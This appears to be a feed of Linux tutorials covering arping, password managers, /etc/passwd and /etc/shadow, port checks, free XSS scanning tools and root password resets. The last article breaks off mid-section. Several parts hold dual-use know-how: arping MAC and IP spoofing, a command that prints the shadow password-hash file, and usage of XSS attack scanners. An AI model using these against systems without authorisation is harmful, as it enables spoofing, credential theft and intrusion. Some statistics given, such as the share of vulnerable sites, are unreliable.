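Nmap should be used for real scans, but the core idea behind a basic TCP connect scan can be sketched without it. The following Bash-only sketch (an illustration, not a substitute for nmap) uses Bash's built-in /dev/tcp pseudo-device to probe a few well-known ports on the local machine; the port list is an arbitrary example:

```shell
# Minimal TCP connect check using Bash's /dev/tcp pseudo-device.
# This only illustrates the idea behind a connect scan; use nmap for real work.
for port in 22 80 443; do
  if timeout 1 bash -c "echo > /dev/tcp/127.0.0.1/$port" 2>/dev/null; then
    echo "port $port open"
  else
    echo "port $port closed"
  fi
done
```

Each probe attempts a plain TCP connection, which is what nmap's connect scan (-sT) does at a much larger scale and with far better reporting.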

Conclusion

Open Source Intelligence is a useful technique that you can use to find out almost anything on the Web. Having knowledge of OSINT tools is a good thing, as it can have great implications for your professional work. There are some great projects that are using OSINT, such as finding lost people on the Internet. Out of numerous Intelligence sub-categories, Open Source is the most widely used because of its low cost and extremely valuable output.

How to Use arping Command in Linux https://linuxhint.com/use-arping-command-linux/ Tue, 24 Nov 2020 13:14:44 +0000 https://linuxhint.com/?p=78009 To a network administrator, the ARP protocol may sound familiar. ARP is a protocol that Layer 2 devices implement for discovering and communicating with each other. The arping tool works using this protocol.

Now, why would you need arping? Imagine you are working with a small office network. Using the classic ping command to verify host availability is very tempting, right? Well, ping relies on the ICMP protocol, which many hosts and firewalls are configured to ignore; meanwhile, on a local network, your system already performs ARP requests under the hood to resolve each device's hardware address.

This is where the arping tool comes in. Like ping, arping pings network hosts, but it uses link-layer ARP packets instead of ICMP. This method is useful for hosts that do not respond to Layer 3 and Layer 4 ping requests.

This article shows you how to use the arping command in Linux.

Arping in Linux

Among network admins, arping is a popular tool. However, it does not come included in the default set of tools offered by Linux. So, you will have to install arping manually.

Thankfully, arping is a popular tool. No matter what distro you are using, it should be available directly from the official package servers. Run the following command according to your distro.

For Debian/Ubuntu and derivatives, the net-tools package is necessary for the arp tool:

$ sudo apt install arping net-tools

For Fedora and derivatives:

$ sudo dnf install arping

For openSUSE and derivatives:

$ sudo zypper install arping2

Using arping

Discover Hosts

If multiple devices are connected over Ethernet, the systems already maintain an internal ARP table for communicating over the network. You can use the arp tool to list the entries known to your system.

Run the following command to do so:

$ arp -a

As you can see, the command will print a list of hostnames, along with their IP and MAC addresses.
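On Linux, the same table that the arp tool prints is exposed by the kernel as a plain text file, /proc/net/arp, which can be processed with standard tools. A small awk sketch (assuming the standard /proc/net/arp column layout) prints each entry's IP and MAC address:

```shell
# Skip the header line of /proc/net/arp and print the IP (column 1)
# and MAC address (column 4) of each entry.
awk 'NR > 1 { printf "%s -> %s\n", $1, $4 }' /proc/net/arp
```

This is handy for scripting, since the output format is stable and easy to parse, unlike the human-oriented output of arp -a.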
Ping Hosts

If you know the IP address of the target device, you can simply pass the address to arping to perform an ARP ping.

$ arping <ip-address>


Arping also allows you to define the number of times to ping the target device. To do so, use the “-c” flag, followed by the number of pings to perform.
One quick tip: If a new device is identified, you should run the following command to update the ARP table:

$ arp -a

ARP Timeout

If arping cannot resolve the IP address of the target, this will cause an ARP timeout. To demonstrate, run the following command. The IP address should be something inaccessible.

$ arping -c 7 <unreachable-ip>


As you can see, arping will notify you if you did not specify the network interface. This is because arping expects you to specify the interface. If not specified, arping tries to guess it.

Specify Network Interface

As you have seen in the previous section, arping prefers that you specify the network interface. This is especially necessary if there are multiple network interfaces on the server, since arping may not guess the right network card to use.

To avoid this problem, we can manually specify the network interface to arping. If this method is used, arping will utilize the specified network interface instead of doing guesswork.

First, list all the available network interfaces with the following command:

$ ip link show

Then, specify the network interface to arping using the “-I” flag, as shown below:

$ arping -I <interface> -c 7 <ip-address>

Specify Source MAC Address

As in the previous method, it is also possible to specify the MAC address of the source from which you are sending the packets. To achieve this, use the “-s” flag, followed by the MAC address you desire, as follows:

$ arping -c 7 -s <source-mac> <ip-address>

Now, depending on whether you own the MAC address, there are two outcomes:

  1. If you own the MAC address, you can just go with the “-s” flag.
  2. If you do not own the MAC address, then you are trying to spoof it. If that is the case, then you will have to use the promiscuous mode. Check out more on promiscuous mode here. As a quick reminder, this mode is configured in a way that it transmits all frames received by the NIC.

The good thing is, arping can run on the promiscuous mode. To enable this mode, use the “-p” flag. The command will look something like this:

$ arping -c 7 -s <source-mac> -p <ip-address>

Specify Source IP Address

Another interesting feature of arping is the ability to define the source IP address manually. The way that this method works is quite like the previous step.

However, this method does come with its own issues. Once arping pings the device, the device will reply back to the IP address that you manually defined. Without ownership of that IP address, arping will not receive the replies.

To define the source IP address manually, use the “-S” flag.

$ arping -c 7 -S <source-ip> <target-ip>


There are further nuances to this method. How you use this method depends on whether you own the IP address:

  1. If you own the IP address, then you are good to go.
  2. If you do not own the IP address, then you may want to use the promiscuous mode.

If your situation matches the second option, use the “-p” flag to enable the promiscuous mode.

$ arping -c 7 -S <source-ip> -p <target-ip>

Arping Help

While these are the most commonly used arping commands, there are more features that arping offers. For example, arping offers a quick help page for documentation on the fly:

$ arping --help


If you are interested in in-depth information about the features of arping, you may dive deeper into the man page:

$ man arping

Final Thoughts

This tutorial covers some of the more common ways of using arping. You can update the ARP table and spoof MAC and IP addresses using promiscuous mode.

For the ambitious Linux network and system administrators, this need not be the place to stop! Check out Fierce, a more advanced and feature-packed tool used for network scanning.

Happy computing!

Bitwarden in Linux https://linuxhint.com/bitwarden_in_linux/ Tue, 17 Nov 2020 04:29:26 +0000 https://linuxhint.com/?p=76969

In the modern era, the world has seen major progress in the technology sector. New and advanced technologies have made people's lives easier. Not long ago, people used landlines to communicate with one another; now, we have devices such as smartphones. Such advances have truly revolutionized human life in ways that go beyond communication. Technology's impact has been such that every aspect of modern life has merged with it: whether it involves our finances or our social profiles, all rely heavily on technology.

However, this reliance has made us much more vulnerable to data breaches. The real-life cases of Adobe and eBay clearly indicate how serious an issue cybersecurity is. Cyberattacks have been on the rise and, to top it off, new and even more advanced kinds of attacks are being developed every day. Although Linux is much more secure than Windows and other operating systems, it is still vulnerable to viruses.

Hence, it is essential to adopt measures that can protect our machines from these security attacks. One excellent solution is to use password managers. Thus, the topic of our discussion in this article will be Bitwarden, an open-source password manager.

What is Bitwarden?

Bitwarden is a free and open-source password manager that is available for Linux and all other major operating systems, like Windows and macOS. Bitwarden also has extensions for all the popular web browsers, such as Chrome, Firefox, Edge, etc. It even has applications available for both Android and iOS mobile devices. Bitwarden offers a very user-friendly and easy-to-use graphical interface. It works by storing your passwords and other sensitive data inside an encrypted vault, which is itself protected by a master password. Bitwarden offers both free and paid accounts to its users, with the paid tier having different plans, all of which are low-priced compared with the rest of the market. The free version of Bitwarden, however, is also a very notable choice, as it offers a wide array of features that cannot be found in other password managers.

Installing Bitwarden

Before we move on to the installation process of Bitwarden, it is important to know that you need to sign up for an account to use this program. Simply go to the official website of Bitwarden, click the Create your Free Account option, and input your details to create an account.


Once you are done creating your account, it is also good practice to install an extension of Bitwarden inside your web browser for automatic fill-in of your login details. You can install this either by going to the official extension and add-ons page of your browser or by clicking the options available on Bitwarden’s official webpage.


There are two primary methods of installing Bitwarden on your machine. We will look at them in the following section.

Installing Bitwarden Using AppImage

To install Bitwarden using its AppImage, once again, open Bitwarden’s official website. Then, select the Download option from the top of the page and click on the Linux segment found under the Desktop heading.

This will download an AppImage onto your Linux machine. To start using Bitwarden, first, you must give it executable permission. This can be done by right-clicking on the icon and selecting the Properties option. 



Next, open the Permissions tab and click the square box next to the line Allow executing file as program to make your AppImage executable.
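If you prefer the terminal, the same permission change can be made with chmod instead of the Properties dialog. The file name below is a hypothetical stand-in; the actual AppImage name depends on the version you downloaded:

```shell
# "Bitwarden.AppImage" is a hypothetical stand-in for the real file name.
appimage=~/Downloads/Bitwarden.AppImage
mkdir -p ~/Downloads && touch "$appimage"  # stand-in file so this sketch runs anywhere
chmod +x "$appimage"   # same effect as ticking "Allow executing file as program"
ls -l "$appimage"      # the x bits now appear in the permissions column
```

After the executable bit is set, double-clicking the real AppImage (or running it from the shell) launches Bitwarden.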


Now, Bitwarden can be opened by double-clicking the AppImage file.

Installing Bitwarden Using Snap

Another method of installing Bitwarden on your computer is by using Snaps. Snaps are software packages that bundle an application together with all of its dependencies. This removes the hassle of installing dependencies separately from your application. To install Bitwarden using Snap, simply run the following command in the terminal:

$ sudo snap install bitwarden

Using Bitwarden

After downloading and opening Bitwarden, a login menu will appear in front of your screen. Enter your login details to start using Bitwarden. Note that if you were not able to make your Bitwarden account before, you can do so from here.


After logging in, Bitwarden will take you to your Vault, where all your passwords and sensitive data will be saved.


You can manually add items inside your Vault by clicking on the plus icon, as seen in the image above. This will open a window into which you can input any details about your account that you want to add.


You can also change the type of item that you want to add by selecting options from the drop-down menu, as indicated in the image below.


It is important to note that the item details that you input in this window will change depending on what type you choose to add.

When adding accounts to your Vault, you can also use the Password Generator option of Bitwarden, which will automatically generate a secure password for you.


To keep track of all these passwords, you can use the Password History option in the View tab, where all generated passwords will be stored.


You can also sync your account with your web browser by going to the File option and selecting the Sync Vault option. 


Bitwarden even allows you to export your Vault by using the Export Vault option, as seen in the image above. The exported files will be in either the JSON or CSV format.

So, Why Use Bitwarden?

There is no doubt that the Internet has revolutionized the world, as it has now become an integral part of our daily lives. As we are now highly dependent on technology for our day-to-day work, this dependency has paved the way for cybersecurity issues to arise and has led to severe cases of identity theft and data leakage. Bitwarden is an excellent choice to protect your machine from such threats, as it offers a way for users to protect their data and keep their systems secure.

KeePassXC on Linux https://linuxhint.com/keepassxc_linux/ Sun, 15 Nov 2020 05:24:06 +0000 https://linuxhint.com/?p=76670 In the present world, technology runs our lives: we have become fully dependent on devices such as smartphones and computers, and they have become an integral part of our everyday lives. Such has been their impact that a life without these devices can hardly be imagined. With the invention of cars, planes, Google, and computers, humans have indeed become much more efficient and less error-prone. Things like artificial intelligence, cloud computing, blockchains, and virtual reality have opened astounding avenues for humans to explore and have allowed us to step into a realm that could previously only be imagined in science fiction.

However, our dependency on technology has also left our privacy more exposed than ever. Data breaches and cyberattacks have become quite the norm and are growing in scale with time. Linux users have had less to worry about, as Linux systems are often said to be more secure than their counterparts, but it is important to remember that hackers are becoming more skilled, and no system is completely safe from malicious attacks. Therefore, it is essential to employ procedures that protect your Linux system. One excellent solution is to use a password manager, which is the topic of our discussion in this article, where we will focus on an open-source password manager by the name of KeePassXC.

What is KeePassXC?

KeePassXC is a free and open-source password manager based on KeePassX, itself a Linux port of the Windows password manager KeePass. KeePassXC is cross-platform, available for operating systems like Windows, Linux, and macOS. KeePassXC allows users to store all types of sensitive data, such as usernames, passwords, attachments, notes, and so on. It does this by storing the data inside encrypted databases, which are themselves protected by a master password. This works quite efficiently: our data remains secure, and even if someone got their hands on a database, they would not be able to read it without the master password.

Installing KeePassXC

There are mainly two ways of installing KeePassXC on your Linux machine. Let us look at them:
 
1) Installing KeePassXC using AppImage
The first method involves installing KeePassXC using an AppImage. To download this, open the official website of KeePassXC, select the Download option from the top, and under the Linux heading, click on the Official AppImage title.

Linux Header:


Official AppImage:


This will download an AppImage onto your Linux machine. To start using this, first, you must give it executable permission, which can be done by right-clicking on it and selecting the properties option.


Next, open the Permissions tab and click on the square box next to the line Allow executing file as a program to make your AppImage executable.


Now, KeePassXC can simply be opened by double-clicking the AppImage file.
 
2) Installing KeePassXC using Snap
Another way of installing KeePassXC on your Linux system is through the Snap package manager, which allows users to install small packages called snaps that already have all the requirements bundled inside them. This saves time, as there is no need to separately install the dependencies of applications. To install KeePassXC from its Snap, enter the following command into the terminal and press Enter:

$ sudo snap install keepassxc

Using KeePassXC

After downloading and opening KeePassXC, the very first thing you need to do is create your own vault, a password-protected database. To do this, click on the Create new database option. This will open a window where you must enter the name and description of your database:


Fill in the blanks and then press Continue. In the next window, you can change the encryption settings and the database format, as well as some other advanced settings.


Next, you must enter your master password, which will be needed to decrypt and unlock your database. You can also use its built-in auto generator to generate a password for you, as indicated by the arrow in the image below:


You can also add Key Files and YubiKeys for additional protection. 


After pressing Done, KeePassXC will ask you to save your password database. Finally, your vault will appear, which will be empty in the beginning. To add items to your vault, press the plus icon in the toolbar; this opens an entry page where you can fill in the details of your item. KeePassXC also allows users to set expiry dates for entries and provides an auto password generator, as indicated by the circle in the image below:


Along with this, you can add other elements to your entries, such as attachments and icons, and even change their properties. You can also enable the auto-type option, which can automatically fill in your passwords.


KeePassXC also allows you to create folders and subfolders of your passwords, which are called Groups. You can create and edit Groups from the Groups option available on the menu.


You can also import or export passwords into these groups from the KeeShare tab.

Similarly, you can import and export your password databases from the options available in the Database heading in the menu. 


Another excellent feature of KeePassXC is the integration of browsers with your desktop application. You can turn this on by going inside Settings, selecting the Browser Integration option, and then checking the Enable browser integration on. You can then enable the integration for the specific browsers that you have.


Now, your desktop application will remain in sync with your browser extension.

So, Why Use KeePassXC?

Security concerns have risen in the past couple of years as with the demand for the internet increasing, more and more cases of privacy issues are emerging. Using KeePassXC helps to protect your machines from such events and keeps your data secure.

Where and how are passwords stored on Linux? https://linuxhint.com/where_and_how_are_passwords_stored_on_linux/ Tue, 10 Nov 2020 04:56:30 +0000 https://linuxhint.com/?p=76461 A username with a corresponding password for a specific account is the primary requirement through which a user can access a Linux system. All user account passwords are saved in a file or a database, so that a user can be verified during a login attempt. Not every user has the skills and expertise to locate this file on their system. However, if you get access to the database or file that keeps all the login passwords, you can easily access the Linux system. When a user enters a username and password on Linux at login, the entered password is checked against entries in various files of the '/etc' directory.

The /etc/passwd file keeps the important information necessary for user login. To explain it in simpler words, the /etc/passwd file stores user account details. It is a plain text file containing a complete list of all users on your Linux system, with information about the username, password, UID (user ID), GID (group ID), shell, and home directory. This file should be world-readable, as many command-line utilities use it to map user IDs to usernames, but write access should be limited to the superuser or root account.

This article will demonstrate how and where user account passwords are stored on a Linux distribution. We implemented all demonstrations on an Ubuntu 20.04 system; however, you can find the /etc/passwd file on any Linux distribution.

Pre-requisites

You should have root privileges to run administrative commands.

Basic Understanding about /etc/passwd File

The /etc/passwd file contains information about the user accounts of your system. All stored fields are separated by the colon (":") sign.
When you run the following command, you will see each file entry of /etc/passwd file:

$ cat /etc/passwd

The above command will list all users of your Linux system.
The following type of format will display on your terminal screen:

Details about /etc/passwd fields Format
From the above image:

Username: Field one is the username, which is between 1 and 32 characters long and is used when a user logs into the system. In the above example, ‘kbuzdar’ is the username.
Password: The “x” character indicates that the password is stored in encrypted form in the /etc/shadow file.
User ID (UID): Each user must be assigned a unique user ID. UID zero is reserved for the root user, UIDs 1-99 are assigned to predefined or standard accounts, and UIDs 100-999 are assigned to system administrative accounts and groups. In the above screenshot, the user ID is 1001.
Group ID (GID): The next field is the group ID. Group definitions are stored in the /etc/group file. In the above example, the user belongs to the group with GID 1001.
User information (GECOS): The following field is intended for comments. Here you can add additional information about the specified user, such as the user’s full name, phone number, etc. In the above example, no additional information was provided.
Home directory: This field shows the location of the home directory assigned to the user. If the specified directory does not exist, “/” is displayed instead. The above image shows that the home directory of the highlighted user is /home/kbuzdar.
Command/shell: The last field holds the absolute path of the user’s login shell or command, for example /bin/bash. Some system accounts use the nologin shell instead: if this field is set to /sbin/nologin and the user tries to log in directly to the Linux system, the /sbin/nologin shell closes the connection.
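The seven fields described above can be pulled apart with awk, using ‘:’ as the field separator. A minimal sketch, run on a hypothetical entry rather than the live file:

```shell
# Hypothetical /etc/passwd entry piped through awk; with -F: the
# fields become $1 (username) through $7 (shell):
printf 'kbuzdar:x:1001:1001::/home/kbuzdar:/bin/bash\n' |
awk -F: '{ printf "%s uses %s and home %s\n", $1, $7, $6 }'
# → kbuzdar uses /bin/bash and home /home/kbuzdar
```

Running the same awk program against the real /etc/passwd prints one such line per account.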

Search user in /etc/passwd file

You can search for a specific user in the /etc/passwd file using the grep command. For example, to search for the username ‘kbuzdar’ in the /etc/passwd file, use the following syntax, which is much faster than scrolling through the whole file:

$ grep user-name /etc/passwd

With our username substituted in, the command takes the following shape:

$ grep kbuzdar /etc/passwd


Or

$ grep -w '^kbuzdar' /etc/passwd
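The anchored form is safer, because a plain grep for ‘kbuzdar’ would also match lines where the string appears in another field, such as a home-directory path. A small demonstration on two hypothetical entries:

```shell
# Two sample lines: only the first has kbuzdar as the username.
# '^' anchors the match to the start of the line and -w requires a
# whole-word match, so the second line (where 'kbuzdar' appears only
# inside the home-directory field) is skipped:
printf 'kbuzdar:x:1001:1001::/home/kbuzdar:/bin/bash\nbackup2:x:1002:1002::/home/kbuzdar-old:/bin/bash\n' |
grep -w '^kbuzdar'
# → kbuzdar:x:1001:1001::/home/kbuzdar:/bin/bash
```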

Display permissions on /etc/passwd file

As mentioned above, all users except root should have only read permission on the /etc/passwd file, and its owner must be the superuser (root).
Type the following to check the permissions on the file:

$ ls -l /etc/passwd

The following output sample will be displayed on the terminal:

Reading /etc/passwd file

You can read the /etc/passwd file on your Linux system using the following bash script, or by running the while loop below directly in the terminal.
Create a text file and paste the following code into it:

#!/bin/bash
# total seven fields from /etc/passwd stored as $f1, $f2, ..., $f7

while IFS=: read -r f1 f2 f3 f4 f5 f6 f7
do
 echo "User $f1 use $f7 shell and stores files in $f6 directory."
done < /etc/passwd

The while loop reads all seven fields of each entry and prints one line per user on the terminal.
Save the above file under the name ‘readfile.sh’.

Now, run the above file by using the following command:

$ bash readfile.sh

Explore /etc/shadow file

The /etc/shadow file contains the encrypted (hashed) passwords, and it is readable only by the root user.
Let’s run the following command to display the content:

$ sudo cat /etc/shadow

You can see all the passwords in encrypted format:
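Each line of /etc/shadow holds nine colon-separated fields, and the second field is the password hash itself. A sketch using an illustrative line (the hash is shortened) rather than the real file:

```shell
# Illustrative shadow-style entry: field 1 is the username, field 2
# the password hash, field 3 the date of the last password change
# (in days since the epoch):
printf 'kbuzdar:$6$salt$hashed:18545:0:99999:7:::\n' |
awk -F: '{ print "user=" $1, "hash=" $2, "last-change=" $3 }'
# → user=kbuzdar hash=$6$salt$hashed last-change=18545
```

On a live system, the same awk program would be run as root against /etc/shadow itself.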

Conclusion

As the above article has shown, user account details are stored in the /etc/passwd file on a Linux system. Every user can read this file, but only the root user has write permissions on it. Moreover, we have also seen that the encrypted passwords themselves are stored in the /etc/shadow file. You can also explore the /etc/group file to get details about user groups.

]]>
How to Check If a Port Is in Use in Linux https://linuxhint.com/check_port_use_linux/ Fri, 23 Oct 2020 07:14:09 +0000 https://linuxhint.com/?p=72827

If you are from a computer science background, or even a little bit familiar with networking, then you may have heard of the TCP/IP stack. The TCP/IP stack comprises five different layers: the Physical Layer, Data Link Layer, Network Layer, Transport Layer, and Application Layer. Every layer of the TCP/IP stack has a different means of communication, and all communication within the Transport Layer is done via port numbers.

A port number, together with an IP address, uniquely identifies a communication endpoint. Inter-process communication is common when using computer systems, and to facilitate this communication, operating systems keep certain ports open, depending upon the entity with which the user wishes to communicate. So, at any single instance, multiple ports can be open in your system.

When we say that a port is in use, we are essentially referring to a port that is open, or, in other words, a port that is in the listening state (ready to accept connections). There are multiple ways of determining the ports that are open in an operating system. This article shows you four possible methods to use to check whether a port is in use in Linux.

Note: All the methods demonstrated in this article have been executed in Linux Mint 20.

To determine whether a port is in use in Linux Mint 20, any of the following four methods can be used.

Method 1: Using the lsof Command

The lsof command can be used to list all the ports in use in your system in the following manner:

First, launch the Linux Mint 20 terminal by clicking on its shortcut icon. The terminal is shown in the image below:

Next, you will have to install the lsof command if you have never used it before. To do so, execute the following command in the terminal:

$ sudo apt-get install lsof

Upon the successful installation of the command, you will see the following output in the terminal:

Once this command has been installed, it can be used for querying any ports that are in use in Linux. To check your system for open ports, execute the following command in your terminal:

$ sudo lsof -i

In the output of this command, the ports listed in the “LISTEN” state are the ones that are in use, as shown in the image below:
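If the listing is long, the LISTEN filter can be isolated with grep. The two lsof-style lines below are canned, illustrative examples; on a live system you would pipe the real output instead, e.g. ‘sudo lsof -i -P -n | grep LISTEN’:

```shell
# grep keeps only the line containing LISTEN (the listening socket)
# and drops the established connection:
printf 'sshd 812 root 3u IPv4 TCP *:22 (LISTEN)\nfirefox 1201 kb 45u IPv4 TCP 10.0.0.5:43210->151.101.1.69:443 (ESTABLISHED)\n' |
grep LISTEN
```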

Method 2: Using the ss Command

The ss command can be used to determine any open TCP and UDP ports in your system in the following manner:

To query both the TCP and UDP ports that are in use, execute the following command in the terminal:

$ ss -lntup

In the output of this command, the ports (both TCP and UDP) that are in use have the “LISTEN” state, whereas all the other ports show the “UNCONN” state.
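Building on the same output, here is a small sketch for checking one specific port; port 22 is only an example, and grep’s exit status (via -q) drives the branch:

```shell
# ss -lnt lists listening TCP sockets with numeric ports; ':22 '
# matches the local-address column, and grep -q only sets the exit
# status without printing:
if ss -lnt | grep -q ':22 '; then
    echo "port 22 is in use"
else
    echo "port 22 is free"
fi
```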

Method 3: Using the netstat Command

The netstat command can also be used to determine any open TCP and UDP ports in your system in the following manner:

To query for the TCP and UDP ports that are in use, run the following command in the terminal:

$ sudo netstat -pnltu

If you try to run this command without the “sudo” keyword, you will not be able to access all the ports. If you are logged in with the root user account, then you may skip this keyword.

When you run this command, you will be able to see that all ports in use are in the “LISTEN” state, whereas the states of all other ports are unavailable, as shown in the image below:

Method 4: Using the nmap Command

The nmap command is yet another utility that can be used to determine the TCP and UDP ports that are in use in the following manner:

If the nmap utility is not yet installed on your Linux Mint 20 system, as it does not come installed by default, you may have to manually install it. To do so, execute the following command:

$ sudo apt install nmap

Once you have successfully installed the nmap utility on your Linux Mint 20 system, the terminal will return control to you so that you can execute the next command, as shown in the image below:

After installing this utility, query for both the TCP and UDP ports that are in use in your system by running the following command in the terminal:

$ sudo nmap -n -PN -sT -sU -p- localhost

Once you have executed this command, the state of all ports that are in use will be “open,” as shown in the output in the image below:

Conclusion

This article showed you four different methods for checking whether a port is in use in your Linux system. All of these methods were tested on Linux Mint 20; however, you can also run the commands shown in these methods on any other Linux distribution, with slight variations. Each of the commands used in these methods takes only a few seconds to execute, so you have the time to try all four methods and see which one works best for you.

]]>
Free XSS Tools https://linuxhint.com/free_xss_tools/ Thu, 22 Oct 2020 08:54:02 +0000 https://linuxhint.com/?p=72649 Cross-Site Scripting, commonly known as XSS, is a type of vulnerability in which attackers remotely inject custom scripts on web pages. It commonly occurs in sites where data input parameters are improperly sanitized.

Input sanitization is the process of cleansing user input so that the inserted data cannot be used to find or exploit security holes in a website or server.
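As a minimal sketch of what this means in practice, the sed pipeline below escapes the HTML metacharacters in a classic test payload so a browser would render it as text instead of executing it. A real application would use its framework’s escaping functions; this only illustrates the idea:

```shell
# Escape '&' first, so the entities added for '<' and '>' are not
# themselves re-escaped:
printf '<script>alert(1)</script>' |
sed -e 's/&/\&amp;/g' -e 's/</\&lt;/g' -e 's/>/\&gt;/g'
# → &lt;script&gt;alert(1)&lt;/script&gt;
```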

Vulnerable sites are either not sanitized at all or sanitized poorly and incompletely. XSS is an indirect attack: the payload reaches the victim indirectly. The attacker inserts the malicious code into the website, where it becomes part of the page. Whenever a user (the victim) visits the webpage, the malicious code is delivered to their browser, so the user is unaware that anything has happened.

With XSS, an attacker can:

  • Manipulate, destroy, or even deface a website.
  • Expose sensitive user data
  • Capture user’s authenticated session cookies
  • Upload a Phishing page
  • Redirect users to a malicious area

XSS has been in the OWASP Top Ten for the last decade. By some estimates, more than 75% of the surface web is vulnerable to XSS.

There are 4 types of XSS:

  • Stored XSS
  • Reflected XSS
  • DOM-based XSS
  • Blind XSS

When checking for XSS during a pentest, one may grow weary of hunting for injections manually. Most pentesters use XSS tools to get the job done. Automating the process not only saves time and effort but, more importantly, gives accurate results.

Today we will discuss some of the tools which are free and helpful. We will also discuss how to install and use them.

XSSer:

XSSer, or Cross-Site Scripter, is an automatic framework that helps users find and exploit XSS vulnerabilities on websites. It has a pre-installed library of around 1300 attack vectors, which helps it bypass many WAFs.

Let’s see how we can use it to find XSS vulnerabilities!

Installation:

We need to clone xsser from the following GitHub repo.

$ git clone https://github.com/epsylon/xsser.git

Now, xsser is on our system. Move into the xsser folder and run setup.py:

$ cd xsser
$ python3 setup.py

It will install any missing dependencies and then install xsser itself. Now, it is time to run it.

Run GUI:

$ python3 xsser --gtk

A window like this would appear:

If you are a beginner, go through the wizard. If you are a pro, I would recommend configuring XSSer to your own needs through the Configure tab.

Run in Terminal:

$ python3 xsser

Here is a site that challenges you to exploit XSS. We will find a few vulnerabilities by using xsser. We give the target URL to xsser, and it will start checking for vulnerabilities.

Once it is done, the results are saved in a file; here, it is XSSreport.raw. You can always come back to it to see which of the payloads worked. Since this was a beginner-level challenge, most of the vulnerabilities here are marked FOUND.

XSSniper:

Cross-Site Sniper, also known as XSSniper, is another XSS-discovery tool with mass scanning functionality. It scans the target for GET parameters and then injects an XSS payload into them.

Its ability to crawl the target URL for relative links is another useful feature: every link found is added to the scan queue and processed, which makes it easier to test an entire website.

In the end, this method is not foolproof, but it is a good heuristic for mass-finding injection points and testing escape strategies. Also, since there is no browser emulation, you have to manually test the discovered injections against the XSS protections of various browsers.

To install XSSniper:

$ git clone https://github.com/gbrindisi/xsssniper.git

XSStrike:

This cross-site scripting detection tool is equipped with:

  • 4 hand-written parsers
  • an intelligent payload generator
  • a powerful fuzzing engine
  • an incredibly fast crawler

It deals with both reflected and DOM XSS Scanning.

Installation:

$ git clone https://github.com/s0md3v/XSStrike.git
$ cd XSStrike

$ pip3 install -r requirements.txt

Usage:

Optional arguments:

Single URL scan:

$ python xsstrike.py -u http://example.com/search.php?q=query

Crawling example:

$ python xsstrike.py -u "http://example.com/page.php" --crawl

XSS Hunter:

XSS Hunter is a recently launched framework for finding XSS vulnerabilities, with the perks of easy management, organization, and monitoring. It generally works by keeping specific logs through the HTML files of web pages. Its ability to find any type of cross-site scripting vulnerability, including blind XSS (which common tools often miss), gives it an advantage over other XSS tools.

Installation:

$ sudo apt-get install git (if not already installed)
$ git clone https://github.com/mandatoryprogrammer/xsshunter.git

Configuration:

– run the configuration script as:

$ ./generate_config.py

– now start the API as

$ sudo apt-get install python-virtualenv python-dev libpq-dev libffi-dev
$ cd xsshunter/api/
$ virtualenv env
$ . env/bin/activate
$ pip install -r requirements.txt
$ ./apiserver.py

To use the GUI server, execute these commands:

$ cd xsshunter/gui/
$ virtualenv env
$ . env/bin/activate
$ pip install -r requirements.txt
$ ./guiserver.py

W3af:

W3af is another open-source vulnerability testing tool, which mainly uses JavaScript to test specific webpages for vulnerabilities. The main requirement is configuring the tool according to your needs. Once that is done, it will do its work efficiently and identify XSS vulnerabilities. It is a plugin-based tool which is mainly divided into three sections:

  • Core (for basic functioning and providing libraries for plugins)
  • UI
  • Plugins

Installation:

To install w3af on your Linux system, just follow the steps below:

Clone the GitHub repo.

$ sudo git clone https://github.com/andresriancho/w3af.git

Install the version you want to use.

If you would like to use the GUI version:

$ sudo ./w3af_gui

If you prefer to use the console version:

$ sudo ./w3af_console

Both of them will require installing dependencies if not already installed.

A script is created at /tmp/script.sh, which will install all the dependencies for you.

The GUI version of w3af is given as follows:

Meanwhile, the console version is the traditional terminal (CLI)-look tool.

Usage

1. Configure target

In the target menu, run the command set target TARGET_URL.

2. Config audit profile

W3af comes with some profiles that already have properly configured plugins for running an audit. To use a profile, run the command use PROFILE_NAME.

 

3. Config plugin

4. Config HTTP

5. Run audit

For more information, go to http://w3af.org/:

Conclusion:

These tools are just a drop in the ocean as the internet is full of amazing tools. Tools like Burp and webscarab can also be used to detect XSS. Also, hats-off to the wonderful open-source community, which comes up with exciting solutions for every new and unique problem. ]]> How to Change or Reset Root Password in Linux https://linuxhint.com/change_reset_root_pasword_linux/ Thu, 22 Oct 2020 08:49:29 +0000 https://linuxhint.com/?p=72683

If you have not logged in as a root user for a long time and have not saved the login information anywhere, there is a chance that you may lose access to the credentials for your system. It is not an unusual occurrence, but rather, a common issue, which most Linux users have probably encountered before. If this happens, you can easily change or reset the password via the command-line or the GUI (Graphical User Interface).

But what do you do if the root password must be modified or reset?

This article shows you how to change the root password for your Linux Mint 20 system via three different methods.

Note: To change the root password, you must have either the current root password, sudo privileges, or have physical access to the system. It is also recommended to save the new password(s) in a secure location to be accessed when needed.

In this article, we will cover how to:

  1. Change or reset root password as root user
  2. Change or reset root password as sudo user
  3. Change or reset root password using GRUB menu

It is worth mentioning that all the commands included in this article have been tested in the Linux Mint 20 system. These commands have been performed in the Terminal, which can be opened using the Ctrl+Alt+T key shortcut, or by clicking on the terminal icon present in the taskbar of the Linux system.

Change or Reset Root Password as Root User

If you have the current root password and want to reset it, you can do so by using the ‘passwd’ command. Perform the following steps to change or reset the root user password:

First, log in as a root user using the following command in Terminal:

$ su root

When you are asked to provide the password, enter the current root password. Next, you will see the Terminal prompt change to ‘#’, indicating that you are now logged in as the root user.

To change the root password, type the following command in the Terminal:

$ passwd

You will be prompted to enter a new root password. Type the new password and hit the Enter key. Then, re-enter the password and press the Enter key to avoid any typos.

After entering the password, you will be shown a message saying that the password has been updated successfully.

Change or Reset Root Password as Sudo User

The root password can also be changed by a standard user with sudo privileges. You can change or reset the root user password by following the steps given below:

Type the following command as a sudo user in the Terminal to change the root password.

$ sudo passwd root

You will be asked to type a new password for the root user. Enter a new password and press Enter. Then, re-enter the password and press the Enter key to avoid any typos.

After entering the password, you will be shown a message saying that the password has been updated successfully.
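For scripts, a non-interactive alternative is the chpasswd utility from shadow-utils, which reads ‘user:password’ pairs on standard input. The sketch below only builds and prints the pair; the commented-out line would perform the actual change and must be run as root (the password shown is, of course, only illustrative):

```shell
# Build the 'user:password' line that chpasswd expects on stdin:
pair='root:NewStrongPassword'
printf '%s\n' "$pair"
# printf '%s\n' "$pair" | sudo chpasswd   # performs the change
```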

Change or Reset Root Password Using GRUB Menu

If you are a root user and have forgotten the root password to your system, then you can reset the root password using the GRUB menu. GRUB is the first program that starts at system boot. However, keep in mind that physical access to your system is required to use the method described in this section.

To reset or change the root password using the GRUB menu, perform the following steps:

